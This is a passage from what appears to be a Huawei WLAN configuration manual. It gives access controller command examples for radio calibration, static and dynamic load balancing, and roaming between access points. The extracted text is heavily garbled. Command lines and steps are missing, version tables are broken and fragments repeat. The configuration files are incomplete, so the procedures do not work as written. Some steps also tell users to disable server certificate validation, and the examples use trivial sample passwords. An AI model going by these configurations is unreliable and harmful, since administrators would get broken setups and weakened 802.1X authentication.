WPA2.
# Create a traffic profile named traffic and retain the default settings in the profile.
[AC-wlan-service-set-test] ssid test
[AC-wlan-service-set-test] service-vlan 101
[AC-wlan-service-set-test] forward-mode tunnel
Step 7 Configure VAPs and deliver VAP parameters to APs.

# Configure VAPs.
[AC-wlan-radio-1/0] service-set name test

Step 8 Configure radio calibration.

# Set the radio working mode to hybrid.
[AC-wlan-radio-1/0] work-mode hybrid
Warning: Modify the work mode may cause business interruption, continue?(y/n)[n]
:y
:y
:y
# Set the radio calibration mode to schedule, configure the device to start radio calibration at
3:00 a.m. every day.
[AC-wlan-view] calibrate enable schedule time 03:00:00
# Enable radio calibration in the radio profile view. By default, radio calibration is enabled in
the radio profile view.
:y[AC-wlan-view] commit ap 2
:y

l After the preceding configurations are complete, the AC begins to adjust the channels
and power of the three APs to ensure that the APs work at optimal performance.
l STAs can connect to the WLAN with SSID test. Use AP1 as an example. Run the
display station assoc-info ap 1 command on AC. The command output shows that the
STAs associate with the WLAN test.
[AC-wlan-view] display station assoc-info ap 1
------------------------------------------------------------------------------
------------------------------------------------------------------------------
14cf-9208-9abf 1 0 1 test
------------------------------------------------------------------------------
Total stations: 1
You can run the display statistics calibrate ap 1 radio 0 command on AC to check
radio calibration statistics on AP1.
[AC-wlan-view] display statistics calibrate ap 1 radio 0
-----------------------------------------------------------------------
Signal environment deterioration :
1
Power calibration :
1
Channel calibration :
0

-----------------------------------------------------------------------
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
#
#
#
#
return

#
sysname AC
#
#
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
#
interface Vlanif101
ip address 192.168.11.1 255.255.255.0
#
#
#
interface Wlan-Ess1
#
wlan
ap-region id 10
region-id 10

ap id 2 type-id 19 mac dcd2-fc04-b500 sn 210235555310CC000094

region-id 10
ap id 3 type-id 19 mac dcd2-fc96-e4c0 sn 210235582910D1000039
region-id 10
forward-mode tunnel
wlan-ess 1
ssid test
service-vlan 101
calibrate enable schedule time 03:00:00
wmm-profile id 1
ap 1 radio 0
radio-profile id 1
work-mode hybrid
ap 2 radio 0
radio-profile id 1
work-mode hybrid
ap 3 radio 0
radio-profile id 1
work-mode hybrid
#
return
15.8.2 Example for Configuring Session-based Static Load

Balancing
Session-based Static Load Balancing Overview
Load balancing can evenly distribute AP traffic loads to ensure sufficient bandwidth for each
STA. In static load balancing, APs are manually added to a load balancing group. When a
STA wants to connect to an AP in the load balancing group, the AC determines whether to
allow the STA to connect to the AP according to a load balancing algorithm.
Static load balancing can be used in scenarios such as conference rooms. For example, if two
APs are deployed in a conference room, you can add the two APs to a load balancing group to
prevent heavy load on a single AP.
Configuration Notes


l Each load balancing group supports a maximum of three APs.
l APs on which load balancing needs to be configured must be configured within the same
AP region.
l A load balancing group is a set of radios. A radio can join only one load balancing
group. If dual-band APs are used, traffic is load balanced among APs working on the
same frequency band. That is, a dual-band AP can join two load balancing groups.
l All APs in a load balancing group work on the same frequency band (2.4 GHz or 5
GHz). AP radios in a load balancing group must have different channels configured and
work on different channels.
Configuration.


are
Versi
on
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200R005C30:
As shown in Figure 15-8, AP1 and AP2 connect to the AC through SwitchA and join AP
region 10.
When a large number of STAs access the Internet through the same AP, the AP is heavily
loaded, reducing WLAN service quality. The enterprise wants STAs to be balanced on the two
APs to prevent one AP from being heavily loaded.

Figure 15-8 Networking for configuring session-based static load balancing
Internet
GE1/0/3
VLAN101
AC
GE1/0/1
GE0/0/3 VLAN100
VLAN100
SwitchA
GE0/0/1 GE0/0/2
VLAN100 VLAN100
AP1 AP2
STA1 STA2 STA4 STA3

Management VLAN: VLAN100
AP region ID: 10
Data Planning


source interface

l Security and
WPA2+PSK
huawei123


l SSID: test
WLAN-ESS 1
tunnel forwarding


range 192.168.10.1/24
192.168.10.2 to
192.168.10.254/24

range 192.168.11.1/24
192.168.11.2 to
192.168.11.254/24

WLAN.
2. Configure session-based static load balancing to prevent new STAs from associating
with heavily-loaded APs.
Procedure
# Configure SwitchA and add interfaces GE0/0/1, GE0/0/2, and GE0/0/3 to management
VLAN 100.



[HUAWEI] sysname AC
[AC] vlan batch 100

[AC] vlan batch 101
# Configure a DHCP server to assign IP addresses to the APs from the IP address pool on
VLANIF 100 and assign IP addresses to STAs from the IP address pool on VLANIF 101.
[AC-Vlanif100] quit
[AC-Vlanif101] quit


AC ID to 1.

[AC] wlan

------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------

17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23
APs offline based on the AP type ID. Assume that the type of AP1 and AP2 is AP6010DN-
AGN, and their MAC addresses are 60de-4476-e360 and dcd2-fc04-b500 respectively.
[AC-wlan-view] ap-auth-mode mac-auth
[AC-wlan-ap-1] quit
[AC-wlan-ap-2] quit

[AC-wlan-ap-1] quit
[AC-wlan-ap-2] quit
# After powering on AP1 and AP2, run the display ap all command on the AC to check the
All AP information:
------------------------------------------------------------------------------
/Region
------------------------------------------------------------------------------
------------------------------------------------------------------------------


Set the channel mode to fixed.
[AC-wlan-radio-prof-radio] channel-mode fixed //Set the channel mode fixed. The
default value is auto.
[AC-wlan-view] quit

[AC-Wlan-Ess1] quit

[AC] wlan
WPA2.
[AC-wlan-service-set-test] ssid test //Name the SSID test.
[AC-wlan-service-set-test] service-vlan 101 //Set the VLAN ID of the service set
to 101. The default value is 1.
to tunnel forwarding.

# Configure VAPs.
[AC-wlan-radio-1/0] radio-profile name radio //Bind the radio profile to a radio.
[AC-wlan-radio-1/0] channel 20mhz 11 //Set the working channel of the radio to
11 and the channel bandwidth to 20 MHz.
Step 8 Configure a load balancing group, add AP1 and AP2 to the load balancing group, and set the
load balancing mode of the group to session-based load balancing.
[AC-wlan-view] load-balance-group name huawei //Create load balancing group
huawei.
[AC-wlan-load-group-huawei] member ap-id 1 radio-id 0 //Add AP1 radio 0 to load

balancing group huawei.

[AC-wlan-load-group-huawei] member ap-id 2 radio-id 0
[AC-wlan-load-group-huawei] session gap 5 //Configure session-based static load
balancing and set the load difference threshold to 5%. The default value is 4%.
[AC-wlan-load-group-huawei] associate-threshold 10 //Set the maximum number of
association requests in a static load balancing group to 10. The default value is
6.
[AC-wlan-load-group-huawei] quit
:y

l After the preceding configuration is complete, STAs can discover the WLAN with SSID
test.
l When a new STA requests to access the Internet through an AP, the AC uses a static load
balancing algorithm to determine whether to allow access from the STA. If the load
difference between the APs is larger than 5%, the AC rejects the association request of
the STA. If the STA continues sending association requests to the AP for more than 10
times, the AC allows the STA to associate with the AP.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
#
#
#
return

#
sysname AC
#
#
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
#
interface Vlanif101
ip address 192.168.11.1 255.255.255.0


#
#
#
interface Wlan-Ess1
#
wlan
ap-region id 10
region-id 10
region-id 10
forward-mode tunnel
wlan-ess 1
ssid test
service-vlan 101
channel-mode fixed
wmm-profile id 1
ap 1 radio 0
radio-profile id 1
channel 20MHz 11
ap 2 radio 0
radio-profile id 1
channel 20MHz 6
load-balance-group name huawei id 0
associate-threshold 10
session gap 5
member ap-id 1 radio-id 0
member ap-id 2 radio-id 0
#
return
15.8.3 Example for Configuring Traffic-based Dynamic Load

Balancing
Traffic-based Dynamic Load Balancing Overview
STA. When a STA joins the network, the AC adds the APs that report the STA to a load
balancing group, and then uses a load balancing algorithm to determine whether to allow
access from the STA.
Dynamic load balancing applies to high-density wireless environments, such as stadiums and
stations.
Static load balancing supports a limited number of group members, and all members must be
manually added to the group and work on the same frequency band. Dynamic load balancing
overcomes these limitations and can better ensure bandwidth for each STA.

Configuration Notes
l Radio traffic statistics packets are sent and received together with Echo packets. In this
example, traffic-based dynamic load balancing is used. You are advised to set the
CAPWAP heartbeat detection interval to 30s to 60s so that the radio traffic statistics can
be updated in a timely manner.
Configuration.


are
Versi
on
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200R005C30:
As shown in Figure 15-9, AP1 and AP2 connecting to the AC through SwitchA are dual-band
APs and join AP region 10. STAs in AP region 10 support 2.4 GHz and 5 GHz frequency
bands. Both 2.4 GHz and 5 GHz WLANs need to be deployed in AP region 10.
When a large number of STAs access the Internet through the same AP, the AP is heavily
loaded, reducing WLAN service quality. The enterprise wants STAs to be balanced on the two
APs to prevent one AP from being heavily loaded.

Figure 15-9 Networking for configuring traffic-based dynamic load balancing
Internet
GE1/0/3
VLAN101
AC
GE1/0/1
GE0/0/3 VLAN100
VLAN100
SwitchA
GE0/0/1 GE0/0/2
VLAN100 VLAN100
AP1 AP2
STA1 STA2 STA4 STA3

Management VLAN: VLAN100
AP region ID: 10
Data Planning


source interface

l Security and
WPA2+PSK
huawei123


l SSID: test
WLAN-ESS 1
tunnel forwarding


range 192.168.10.1/24
192.168.10.2 to
192.168.10.254/24

range 192.168.11.1/24
192.168.11.2 to
192.168.11.254/24

WLAN.
2. Configure traffic-based dynamic load balancing to prevent new STAs from associating
with heavily-loaded APs.
Procedure
# Configure SwitchA and add interfaces GE0/0/1, GE0/0/2, and GE0/0/3 to management
VLAN 100.



[HUAWEI] sysname AC
[AC] vlan batch 100

[AC] vlan batch 101
[AC-Vlanif100] quit
[AC-Vlanif101] quit


AC ID to 1.

[AC] wlan

------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------

17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23
[AC-wlan-view] ap-auth-mode mac-auth
[AC-wlan-ap-1] quit
[AC-wlan-ap-2] quit

[AC-wlan-ap-1] quit
[AC-wlan-ap-2] quit
All AP information:
------------------------------------------------------------------------------
/Region
------------------------------------------------------------------------------
------------------------------------------------------------------------------


Set the channel mode to fixed.
[AC-wlan-radio-prof-radio] channel-mode fixed //Set the channel mode fixed. The
default value is auto.
[AC-wlan-view] quit

[AC-Wlan-Ess1] quit

[AC] wlan
WPA2.
[AC-wlan-service-set-test] ssid test //Name the SSID test.
[AC-wlan-service-set-test] service-vlan 101 //Set the VLAN ID of the service set
to 101. The default value is 1.
to tunnel forwarding.

# Configure VAPs.
[AC-wlan-radio-1/0] radio-profile name radio //Bind the radio profile to a radio.
[AC-wlan-radio-1/0] channel 20mhz 11 //Set the working channel of the radio to
11 and the channel bandwidth to 20 MHz.
[AC-wlan-radio-1/1] channel 40mhz-plus 157 //Set the working channel of the
radio to 157 and the channel bandwidth to 40MHz Plus.

[AC-wlan-radio-2/1] channel 40mhz-plus 149
Step 8 Configure dynamic load balancing.

[AC-wlan-view] sta-load-balance enable //Enable dynamic load balancing.
[AC-wlan-view] sta-load-balance mode traffic //Configure traffic-based dynamic
load balancing.
[AC-wlan-view] sta-load-balance traffic gap 25 //Set the load difference
threshold to 25%. The default value is 20%.
[AC-wlan-view] sta-load-balance associate-threshold 10 //Set the maximum number
of association requests in dynamic load balancing to 10. The default value is 6.
[AC-wlan-view] commit ap 1 //Commit the configuration.
:y[AC-wlan-view] quit

l After the preceding configuration is complete, STAs can discover the WLAN with SSID
test.
l You can run the display sta-load-balance config command on the AC to check the
dynamic load balancing configuration.
[AC] display sta-load-balance config
Sta-load-balance
config:
------------------------------------------------------------------------------
Sta-load-balance enable :
Yes
Sta-load-balance mode :
Traffic
Sta-load-balance session gap threshold :
4
Sta-load-balance traffic gap threshold :
25
Sta-load-balance associate threshold :
10
------------------------------------------------------------------------------
l If a new STA requests to connect to one of the four VAPs in AP region 10, the AC uses a
dynamic load balancing algorithm to determine whether to allow access from the STA. If
the load difference between the requested VAP and the lowest load is larger than 25%,
the AC rejects the association request of the STA. If the STA continues sending
association requests to the VAP for more than 10 times, the AC allows the STA to
associate with the VAP.
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#

#
#
#
return
#
sysname AC
#
#
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
#
interface Vlanif101
ip address 192.168.11.1 255.255.255.0
#
#
#
interface Wlan-Ess1
#
wlan
ap-region id 10
region-id 10
region-id 10
sta-load-balance
enable
sta-load-balance mode
traffic
sta-load-balance traffic gap
25
sta-load-balance associate-threshold 10
forward-mode tunnel
wlan-ess 1
ssid test
service-vlan 101
channel-mode fixed
wmm-profile id 1
ap 1 radio 0
radio-profile id 1

channel 20MHz 11
ap 1 radio
1
radio-profile id
1
channel 40MHz-plus
157
ap 2 radio 0
radio-profile id 1
channel 20MHz 6
ap 2 radio 1
radio-profile id 1
channel 40MHz-plus 149
#
return

15.9.1 Example for Configuring Non-Fast Roaming Between APs
in the Same Service VLAN
Roaming Between APs in the Same Service VLAN Overview
WLAN roaming allows an STA to move from the coverage area of an AP to that of another
AP with nonstop service transmission. Roaming between APs in the same service VLAN
allows an STA to move between two APs that connect to the same AC and belong to the same
service VLAN without service interruption.
Roaming between APs in the same service VLAN is classified into fast roaming and non-fast
roaming. Non-fast roaming technology is used when an STA uses a non-WPA2-802.1x
security policy. If an STA uses WPA2-802.1x but does not support fast roaming, the STA still
needs to complete 802.1x authentication before roaming between two APs. When the user
uses the WPA2-802.1x security policy and supports fast roaming, the user does not need to
perform 802.1x authentication again during roaming and only needs to perform key
negotiation. In this case, fast roaming reduces the roaming delay and improves the WLAN
service experience.
Configuration Notes
l The APs on which WLAN roaming is implemented must use the same SSID and security
profiles, and the security profiles must have the same configurations.
l In direct forwarding mode, if the ARP entry of a user is not aged out in time on the
access device connected to the AP after the user roams, services of the user will be
temporarily interrupted. You are advised to enable STA address learning on the AC.
After the function is enabled, the AP will send a gratuitous ARP packet to the access
device so that the access device can update ARP entries in a timely manner. This ensures
nonstop service transmission during user roaming.
You can use either of the following methods to enable STA address learning according to
the version of your product:
– Versions earlier than V200R007C20 and V200R008: run the learn client ip-
address enable command in the service set view.

– V200R007C20: run the undo learn-client-address disable command in the VAP

profile view.
Configuration.

are
Versi
on
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C00:

AGN, AP7110SN-GN


are
Versi
on
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200R005C30:
As shown in Figure 15-10, a department in a campus network deploys two APs that are
managed and controlled by an AC. The AC dynamically assigns IP addresses to the APs and
STAs. All users in the department belong to the same VLAN, that is, AP1 and AP2 use the
same service VLAN. The default security policy (WEP open system authentication) is used.
User data is forwarded through tunnels.
The department requires that services should not be interrupted when an STA moves from
AP1 to AP2.

Figure 15-10 Networking diagram for configuring non-fast roaming between APs in the same
service VLAN
In te rn e t
G E 1 /0 /3
VLAN 101
AC
G E 1 /0 /1
VLAN 100 G E 0 /0 /3
S w itch A VLAN 100
G E 0 /0 /1 G E 0 /0 /2
VLAN 100 VLAN 100
AP1 AP2
S S ID : te st Roam S S ID : te st
Channel 1 Channel 6
STA STA

S e rv ice V L A N : V L A N 1 0 1
Data Planning


source interface

l Security and
WPA2+PSK
huawei123


l SSID: test
WLAN-ESS 1
tunnel forwarding


pool range 192.168.10.1/24
192.168.10.2 to
192.168.10.254/24

pool range 192.168.11.1/24
192.168.11.2 to
192.168.11.254/24
1. The default security policy is used and access authentication is not required, which
shortens the roaming switchover time. Configure non-fast roaming between APs in the
same service VLAN to ensure nonstop service transmission during roaming.
2. Configure parameters used for communication between the AC and APs to transmit
CAPWAP packets.
3. Configure the AC to function as a DHCP server to assign IP addresses to the STAs and
APs.
4. Configure basic WLAN services to enable the STAs to connect to the WLAN.
Procedure
Step 1 Set the NAC mode on AC to unified mode (default setting). Configure SwitchA and the AC
so that the APs and AC can transmit CAPWAP packets.
# Configure the SwitchA: add interfaces GE0/0/1, GE0/0/2, and GE0/0/3 to management
VLAN 100.



[HUAWEI] sysname AC
[AC] vlan batch 100

# Add AC uplink interface GE1/0/3 to VLAN 101(Service VLAN).
[AC] vlan batch 101
VLANIF 101.
[AC-Vlanif100] quit
[AC-Vlanif101] quit


AC ID to 1.

[AC] wlan

------------------------------------------------------------------------------

ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23
[AC-wlan-ap-1] quit
[AC-wlan-ap-2] quit

[AC-wlan-view] ap-region id 10 //Create AP region 10
[AC-wlan-ap-1] region-id 10 //Add AP1 to region 10
[AC-wlan-ap-1] quit
[AC-wlan-ap-2] quit
All AP information:
------------------------------------------------------------------------------
/Region
------------------------------------------------------------------------------
------------------------------------------------------------------------------


[AC-wlan-view] quit

[AC-Wlan-Ess1] quit

[AC] wlan
WPA2.

to tunnel.

After the configuration is complete, the STA can connect to the WLAN with the SSID test in
the coverage area of AP1.
Assume that the STA MAC address is 0025-86aa-0d1c. When the STA connects to the
WLAN with the SSID test in the coverage area of AP1, run the display station assoc-info ap
1 command on the AC to check the STA access information.
<HUAWEI> display station assoc-info ap 1
------------------------------------------------------------------------------
------------------------------------------------------------------------------
0025-86aa-0d1c 1 0 0 test
------------------------------------------------------------------------------
Total stations: 1
When the STA moves from the coverage of AP1 to AP2, run the display station assoc-info
ap 2 command on the AC to check the STA access information. The STA is associated with
AP2.
------------------------------------------------------------------------------
------------------------------------------------------------------------------

0025-86aa-0d1c 2 0 1 test
------------------------------------------------------------------------------
Total stations: 1
Run the display station roam-track sta 0025-86aa-0d1c command on the AC to check the
STA roaming track.
<HUAWEI> display station roam-track sta 0025-86aa-0d1c
------------------------------------------------------------------------------
AP ID Radio ID BSSID TIME
------------------------------------------------------------------------------
1 0 60de-4476-e360 2012/12/23 14:40:37
2 0 dcd2-fc04-b500 2012/12/23 14:40:39
------------------------------------------------------------------------------
Number of roam track: 1
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
#
#
#
return

#
sysname AC
#
#
#
dhcp enable
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
#
interface Vlanif101
ip address 192.168.11.1 255.255.255.0
#
#
#
interface Wlan-Ess1


#
wlan
ap-region id 10
ap id 1 type-id 19 mac 60de-4476-e360 sn 190901007618
region-id 10
ap id 2 type-id 19 mac dcd2-fc04-b500 sn 190901007619
region-id 10
forward-mode tunnel
wlan-ess 1
ssid test
service-vlan 101
channel-mode fixed
wmm-profile id 1
ap 1 radio 0
radio-profile id 1
ap 2 radio 0
radio-profile id 1
channel 20MHz 6
#
return
15.9.2 Example for Configuring Fast Roaming Between APs in the

Same Service VLAN
Roaming Between APs in the Same Service VLAN Overview

service experience.
Configuration Notes

profile view.
Configuration.

are
Versi
on
V200 S12700 V200R005C00:

AGN, AP7110SN-GN


are
Versi
on
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200R005C30:
As shown in Figure 15-11, a department in a campus network deploys two APs that are
managed and controlled by an AC. The AC dynamically assigns IP addresses to the APs and
STAs. All users in the department belong to the same VLAN, that is, AP1 and AP2 use the
same service VLAN. The security policy WPA2-802.1X is used. User data is forwarded
through tunnels.
The department requires that services should not be interrupted when a STA moves from AP1
to AP2.

Figure 15-11 Networking diagram for configuring fast roaming between APs in the same
service VLAN
In te rn e t
G E 1 /0 /3
VLAN 101
G E 1 /0 /4
VLAN 102 R A D IU S se rve r
AC
1 9 2 .1 6 8 .0 .2 /2 4
G E 1 /0 /1
V L A N 1 0 0 G E 0 /0 /3
VLAN 100
G E 0 /0 /1 G E 0 /0 /2
VLAN 100 VLAN 100
S w itch A
AP1 AP2
S S ID ： te st S S ID ： te st
Roam
Channel 1 Channel 6
STA STA

Data Planning


source interface

l Security and
WPA2+802.1X
l Authentication key: hello


l SSID: test
WLAN-ESS 1
tunnel forwarding


pool range 192.168.10.1/24
192.168.10.2 to
192.168.10.254/24

pool range 192.168.11.1/24
192.168.11.2 to
192.168.11.254/24
1. The security policy WPA2-802.1X is used and access authentication is required, which
results in longer roaming switchover time. Configure fast roaming between APs in the
CAPWAP packets.
APs.
5. Configure key negotiation between STAs and APs to shorten the roaming switchover
time.
Procedure
VLAN 100.



[HUAWEI] sysname AC
[AC] vlan batch 100

# Add the AC uplink interface GE1/0/3 to VLAN 101 and add GE1/0/4 of the AC connecting
to the RADIUS server to VLAN 102.
[AC-GigabitEthernet1/0/4] port trunk pvid vlan 102
Step 3 Configure the AC as a DHCP server to allocate IP addresses to STAs and APs, and configure
VLANIF 102 to allow the AC to communicate with the RADIUS server.
[AC-Vlanif100] quit
[AC-Vlanif101] quit
# Configure VLANIF 102.

[AC-Vlanif102] quit
Step 4 Configure an AAA domain to which a RADIUS server template is applied.

information.
NOTE
Ensure that the AC and RADIUS server have the same shared key.
[AC] radius-server template radius_huawei //Creates a RADIUS server template
[AC-radius-radius_huawei] radius-server authentication 192.168.0.2 1812 //

Specify the IP address and the port number of a RADIUS authentication server.
[AC-radius-radius_huawei] radius-server shared-key cipher hello //Configure
the shared key of a RADIUS server
[AC] aaa
[AC-aaa] authentication-scheme radius_huawei //Create an authentication
scheme
[AC-aaa-authen-radius_huawei] authentication-mode radius //Set the
authentication mode to radius.
[AC-aaa] domain huawei.com //Create a domain
[AC-aaa-domain-huawei.com] authentication-scheme radius_huawei //Configure
an authentication scheme in the domain.
[AC-aaa-domain-huawei.com] radius-server radius_huawei //Configure a RADIUS
server template for the domain.
[AC-aaa] quit
NOTE
After domain huawei.com is configured, the domain name is added to the authentication user
name.
2. Test whether a STA can be authenticated using RADIUS authentication. A user name
test@huawei.com and password 123456 have been configured on the RADIUS server.


AC ID to 1.

[AC] wlan

------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE

38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23
[AC-wlan-ap-1] quit
[AC-wlan-ap-2] quit

[AC-wlan-ap-1] quit
[AC-wlan-ap-2] quit
All AP information:
------------------------------------------------------------------------------
/Region
------------------------------------------------------------------------------
------------------------------------------------------------------------------

# Create a WMM profile named wmm and retain the default parameter settings.
[AC-wlan-radio-prof-radio] channel-mode fixed
[AC-wlan-view] quit

[AC-Wlan-Ess1] authentication dot1x //Enable 802.1x authentication.
[AC-Wlan-Ess1] dot1x authentication-method eap //Configure EAP relay


[AC-Wlan-Ess1] domain name huawei.com force //Configure a forcible
[AC-Wlan-Ess1] permit-domain name huawei.com //Configure a permitted domain for
WLAN users.
[AC-Wlan-Ess1] quit
# Create a security profile named security and configure the security policy to
WPA2-802.1X.
[AC] wlan
[AC-wlan-sec-prof-security] security-policy wpa2
[AC-wlan-sec-prof-security] wpa2 authentication-method dot1x encryption-method
ccmp //Configure WPA2 802.1x authentication and encryption.
# Create a traffic profile named traffic and retain the default parameter settings.
[AC-wlan-service-set-test] ssid test
[AC-wlan-service-set-test] service-vlan 101
[AC-wlan-service-set-test] forward-mode tunnel
# Configure a VAP.

:y
:y

After the configuration is complete, the STA can discover the WLAN with the SSID test in
the coverage area of AP1. Use 802.1X authentication on the STA and enter the user name and
password. If the authentication succeeds, the STA can connect to the Internet. Configure the
STA according to the configured authentication mode PEAP.
l Configuration on the Windows XP operating system:
a. On the Association tab page of the Wireless network properties dialog box, add
SSID test, set the authentication mode to WPA2, encryption mode to CCMP, and
encryption algorithm to AES.

b. On the Authentication tab page, set EAP type to PEAP and click Properties. In
the Protected EAP Properties dialog box, deselect Validate server certificate and
click Configure. In the displayed dialog box, deselect Automatically use my
Windows logon name and password and click OK.
l Configuration on the Windows 7 operating system:
a. Access the Manage wireless networks page, click Add, and select Manually
create a network profile. Add SSID test. Set the authentication mode to WPA2-
Enterprise, the encryption mode to CCMP, and the algorithm to AES. Click Next.
b. Scan SSIDs and double-click SSID test. On the Security tab page, set EAP type to
PEAP and click Settings. In the displayed dialog box, deselect Validate server
certificate and click Configure. In the displayed dialog box, deselect
Automatically use my Windows logon name and password and click OK.
------------------------------------------------------------------------------
------------------------------------------------------------------------------
0025-86aa-0d1c 1 0 0 test
------------------------------------------------------------------------------
Total stations: 1
AP2.
------------------------------------------------------------------------------
------------------------------------------------------------------------------
0025-86aa-0d1c 2 0 1 test
------------------------------------------------------------------------------
Total stations: 1
STA roaming track.
------------------------------------------------------------------------------
------------------------------------------------------------------------------
1 0 60de-4476-e360 2012/12/23 14:40:37
2 0 dcd2-fc04-b500 2012/12/23 14:40:39
------------------------------------------------------------------------------
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
#

#
#
return
#
sysname AC
#
#
#
dhcp enable
#
radius-server shared-key cipher %#%#`z0u2h-7qBdp(x:|E]|#62(s!J~(}*DNPx<+Bbr!
%#%
#
aaa
domain huawei.com
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
#
interface Vlanif101
ip address 192.168.11.1 255.255.255.0
#
interface Vlanif102
ip address 192.168.0.1 255.255.255.0
#
#
#
#
interface Wlan-Ess1
#
wlan
ap-region id 10
region-id 10

region-id 10
forward-mode tunnel
wlan-ess 1
ssid test
service-vlan 101
channel-mode fixed
wmm-profile id 1
ap 1 radio 0
radio-profile id 1
ap 2 radio 0
radio-profile id 1
channel 20MHz 6
#
return
15.9.3 Example for Configuring Non-Fast Roaming Between APs

in Different Service VLANs
Roaming Between APs in Different Service VLANs Overview
WLAN roaming allows a STA to move from the coverage area of an AP to that of another AP
with nonstop service transmission. In roaming between APs in different service VLANs, APs
before and after STA roaming belong to different service VLANs. To prevent services of a
user from being interrupted during WLAN roaming, ensure that the service VLAN of the user
remains unchanged after the user roams between two APs.
roaming. Non-fast roaming technology is used when a STA uses a non-WPA2-802.1x security
policy. If a STA uses WPA2-802.1x but does not support fast roaming, the STA still needs to
complete 802.1x authentication before roaming between two APs. When the user uses the
WPA2-802.1x security policy and supports fast roaming, the user does not need to perform
802.1x authentication again during roaming and only needs to perform key negotiation. In this
case, fast roaming reduces the roaming delay and improves the WLAN service experience.
Configuration Notes


profile view.
Configuration.

are
Versi
on
V200 S12700 V200R005C00:

AGN, AP7110SN-GN
V200 S12700 V200R005C00:

AGN, AP7110SN-GN


are
Versi
on
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200 S12700 V200R005C10:

V200R005C20:
AP7030DE, AP9330DN
V200R005C30:
As shown in Figure 15-12, two APs are deployed in a campus network to provide WLAN
services for employees of two departments, and are managed and controlled by an AC. The
AC dynamically assigns IP addresses to the APs and STAs. The employees of the two
departments belong to different VLANs, that is, AP1 belongs to VLAN101 and AP2 belongs
to VLAN102. The default security policy (WEP open system authentication) is used. User
data is forwarded through tunnels.
to AP2.

Figure 15-12 Networking diagram for configuring non-fast roaming between APs in different
service VLANs
In te rn e t
G E 1 /0 /3
VLAN 101
VLAN 102
AC
G E 1 /0 /1
VLAN 100 G E 0 /0 /3
S w itch A VLAN 100
G E 0 /0 /1 G E 0 /0 /2
VLAN 100 VLAN 100
AP1 AP2
S S ID ： te st S S ID ： te st
Channel 1 Roam Channel 6
STA STA
M anagem ent VLAN : VLAN 100 M anagem ent VLAN : VLAN 100
S e rvice V L A N : V L A N 1 0 1 S e rvice V L A N : V L A N 1 0 2
A P re g io n ID : 1 0 A P re g io n ID : 1 0
Data Planning


source interface

l Security and
WPA2+PSK
huawei123

Service set l Name: huawei-1 None

l SSID: test
WLAN-ESS 0
tunnel forwarding
l Name: huawei-2 None

l SSID: test
WLAN-ESS 1
tunnel forwarding


pool range 192.168.10.1/24
192.168.10.2 to
192.168.10.254/24

pool range 192.168.11.1/24
192.168.11.2 to
